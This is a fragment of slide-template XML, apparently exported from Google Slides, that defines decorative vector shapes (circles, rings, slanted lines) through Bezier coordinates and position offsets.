                    <a:cubicBezTo>
                      <a:pt x="3333" y="286"/>
                      <a:pt x="3283" y="110"/>
                      <a:pt x="3133" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3086" y="12"/>
                      <a:pt x="3035" y="1"/>
                      <a:pt x="29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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="370258" y="4858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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="88472" y="25155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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="376818" y="3564044"/>
                <a:ext cx="59004" cy="59022"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3259" h="3260" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1629" y="627"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2180" y="627"/>
                      <a:pt x="2632" y="1079"/>
                      <a:pt x="2632" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2632" y="2181"/>
                      <a:pt x="2180" y="2632"/>
                      <a:pt x="1629" y="2632"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1078" y="2632"/>
                      <a:pt x="627" y="2181"/>
                      <a:pt x="627" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="627" y="1079"/>
                      <a:pt x="1078" y="627"/>
                      <a:pt x="1629" y="627"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1629" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="727" y="1"/>
                      <a:pt x="0" y="728"/>
                      <a:pt x="0" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2532"/>
                      <a:pt x="727" y="3259"/>
                      <a:pt x="1629" y="3259"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2531" y="3259"/>
                      <a:pt x="3258" y="2532"/>
                      <a:pt x="3258" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3258" y="728"/>
                      <a:pt x="2531"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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="196921" y="2238919"/>
                <a:ext cx="22722" cy="22975"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1255" h="1269" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="625" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="0"/>
                      <a:pt x="295" y="72"/>
                      <a:pt x="176" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="216"/>
                      <a:pt x="126" y="241"/>
                      <a:pt x="101" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="317"/>
                      <a:pt x="51" y="342"/>
                      <a:pt x="51" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="417"/>
                      <a:pt x="26" y="467"/>
                      <a:pt x="1" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="542"/>
                      <a:pt x="1" y="592"/>
                      <a:pt x="1" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="793"/>
                      <a:pt x="51" y="943"/>
                      <a:pt x="176" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="1194"/>
                      <a:pt x="452" y="1269"/>
                      <a:pt x="627" y="1269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="778" y="1269"/>
                      <a:pt x="953" y="1194"/>
                      <a:pt x="1054" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="943"/>
                      <a:pt x="1254" y="793"/>
                      <a:pt x="1254" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1254" y="592"/>
                      <a:pt x="1254" y="542"/>
                      <a:pt x="1229" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="467"/>
                      <a:pt x="1204" y="417"/>
                      <a:pt x="1204" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="342"/>
                      <a:pt x="1154" y="317"/>
                      <a:pt x="1154" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1129" y="241"/>
                      <a:pt x="1104" y="216"/>
                      <a:pt x="1054" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="166"/>
                      <a:pt x="1003" y="141"/>
                      <a:pt x="978" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="91"/>
                      <a:pt x="903" y="66"/>
                      <a:pt x="853" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="828" y="41"/>
                      <a:pt x="778" y="16"/>
                      <a:pt x="753" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="711" y="5"/>
                      <a:pt x="668" y="0"/>
                      <a:pt x="6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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="603052" y="0"/>
                <a:ext cx="22704" cy="22595"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1254" h="1248" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="614" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="0"/>
                      <a:pt x="288" y="57"/>
                      <a:pt x="176" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="194"/>
                      <a:pt x="125" y="219"/>
                      <a:pt x="100" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="295"/>
                      <a:pt x="50" y="320"/>
                      <a:pt x="50" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="395"/>
                      <a:pt x="0" y="445"/>
                      <a:pt x="0" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="520"/>
                      <a:pt x="0" y="570"/>
                      <a:pt x="0" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="771"/>
                      <a:pt x="50" y="946"/>
                      <a:pt x="176" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="1172"/>
                      <a:pt x="451" y="1247"/>
                      <a:pt x="627" y="1247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="777" y="1247"/>
                      <a:pt x="952" y="1172"/>
                      <a:pt x="1053" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="946"/>
                      <a:pt x="1253" y="771"/>
                      <a:pt x="1253" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1253" y="570"/>
                      <a:pt x="1228" y="520"/>
                      <a:pt x="1228" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1228" y="445"/>
                      <a:pt x="1203" y="395"/>
                      <a:pt x="1203" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="320"/>
                      <a:pt x="1153" y="295"/>
                      <a:pt x="1128" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1103" y="219"/>
                      <a:pt x="1078" y="194"/>
                      <a:pt x="1053" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="57"/>
                      <a:pt x="777"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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-7" y="1029179"/>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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="341846" y="9701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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="584884" y="20180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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="507951" y="28901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8" name="Google Shape;1238;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="853926" y="2268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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1272693" y="165079"/>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0" name="Google Shape;1240;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="294125" y="4807625"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1241" name="Google Shape;1241;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="0"/>
            <a:ext cx="625763" cy="3288755"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="625763" cy="3288755"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Google Shape;17;p4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="201918" y="63821"/>
              <a:ext cx="72619" cy="101243"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4011" h="5592" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3663" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3555" y="1"/>
                    <a:pt x="3449" y="56"/>
                    <a:pt x="3384" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5090"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5241"/>
                    <a:pt x="26" y="5441"/>
                    <a:pt x="176" y="5542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="5567"/>
                    <a:pt x="276" y="5592"/>
                    <a:pt x="351" y="5592"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="5592"/>
                    <a:pt x="552" y="5542"/>
                    <a:pt x="602" y="5441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3910" y="504"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4011" y="354"/>
                    <a:pt x="3960" y="153"/>
                    <a:pt x="3835" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3782" y="17"/>
                    <a:pt x="3722" y="1"/>
                    <a:pt x="3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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="444976" y="15434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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="111628" y="3180578"/>
              <a:ext cx="60362" cy="108177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3334" h="5975" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2984" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="1"/>
                    <a:pt x="2759" y="57"/>
                    <a:pt x="2707" y="160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="5524"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5674"/>
                    <a:pt x="75" y="5850"/>
                    <a:pt x="226" y="5925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="5950"/>
                    <a:pt x="326" y="5975"/>
                    <a:pt x="351" y="5975"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="5975"/>
                    <a:pt x="577" y="5900"/>
                    <a:pt x="652" y="5800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3258" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3333" y="286"/>
                    <a:pt x="3283" y="110"/>
                    <a:pt x="3133" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3086" y="12"/>
                    <a:pt x="3035" y="1"/>
                    <a:pt x="29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522658" y="4858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88472" y="25155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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="196921" y="2238919"/>
              <a:ext cx="22722" cy="22975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1269" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="26" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="943"/>
                    <a:pt x="176" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="627" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1269"/>
                    <a:pt x="953" y="1194"/>
                    <a:pt x="1054" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="943"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1254" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1154" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1129" y="241"/>
                    <a:pt x="1104" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1028" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="978" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="753" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="5"/>
                    <a:pt x="668" y="0"/>
                    <a:pt x="6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a:off x="603052" y="0"/>
              <a:ext cx="22704" cy="22595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1248" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="614" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="0"/>
                    <a:pt x="288" y="57"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="194"/>
                    <a:pt x="125" y="219"/>
                    <a:pt x="100" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="295"/>
                    <a:pt x="50" y="320"/>
                    <a:pt x="50" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="395"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="520"/>
                    <a:pt x="0" y="570"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="50" y="946"/>
                    <a:pt x="176" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="451" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="952" y="1172"/>
                    <a:pt x="1053" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1253" y="771"/>
                    <a:pt x="1253" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="570"/>
                    <a:pt x="1228" y="520"/>
                    <a:pt x="1228" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1228" y="445"/>
                    <a:pt x="1203" y="395"/>
                    <a:pt x="1203" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="320"/>
                    <a:pt x="1153" y="295"/>
                    <a:pt x="1128" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="219"/>
                    <a:pt x="1078" y="194"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="57"/>
                    <a:pt x="777"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a:off x="-7" y="1029179"/>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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="51484" y="10274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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8431104" y="1818952"/>
            <a:ext cx="712884" cy="3324549"/>
            <a:chOff x="8431104" y="1818952"/>
            <a:chExt cx="712884" cy="3324549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Google Shape;27;p4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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8955190" y="4621461"/>
              <a:ext cx="36789" cy="116379"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2032" h="6428" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="347" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="0"/>
                    <a:pt x="300" y="4"/>
                    <a:pt x="277" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="62"/>
                    <a:pt x="1" y="212"/>
                    <a:pt x="26" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1379" y="6202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="6327"/>
                    <a:pt x="1555" y="6428"/>
                    <a:pt x="1680" y="6428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1755" y="6428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1931" y="6378"/>
                    <a:pt x="2031" y="6227"/>
                    <a:pt x="2006" y="6052"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="653" y="237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="610" y="110"/>
                    <a:pt x="47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8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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9016004" y="2994926"/>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8809535" y="5000109"/>
              <a:ext cx="59475" cy="59457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3285" h="3284" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1655" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="627"/>
                    <a:pt x="2657" y="1103"/>
                    <a:pt x="2657" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="2206"/>
                    <a:pt x="2206" y="2657"/>
                    <a:pt x="1655" y="2657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="2657"/>
                    <a:pt x="627" y="2206"/>
                    <a:pt x="627" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1103"/>
                    <a:pt x="1079" y="627"/>
                    <a:pt x="1655" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1655" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="1" y="752"/>
                    <a:pt x="1" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2556"/>
                    <a:pt x="753" y="3283"/>
                    <a:pt x="1655" y="3283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="3283"/>
                    <a:pt x="3284" y="2556"/>
                    <a:pt x="3284" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3284" y="752"/>
                    <a:pt x="2557" y="0"/>
                    <a:pt x="1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9121267" y="3702904"/>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8431104" y="5120924"/>
              <a:ext cx="22704" cy="22577"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1247" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="615" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="0"/>
                    <a:pt x="289" y="56"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="294"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="51" y="946"/>
                    <a:pt x="176" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="452" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="928" y="1172"/>
                    <a:pt x="1053" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1254" y="771"/>
                    <a:pt x="1254" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="445"/>
                    <a:pt x="1178" y="294"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="56"/>
                    <a:pt x="777" y="0"/>
                    <a:pt x="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9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
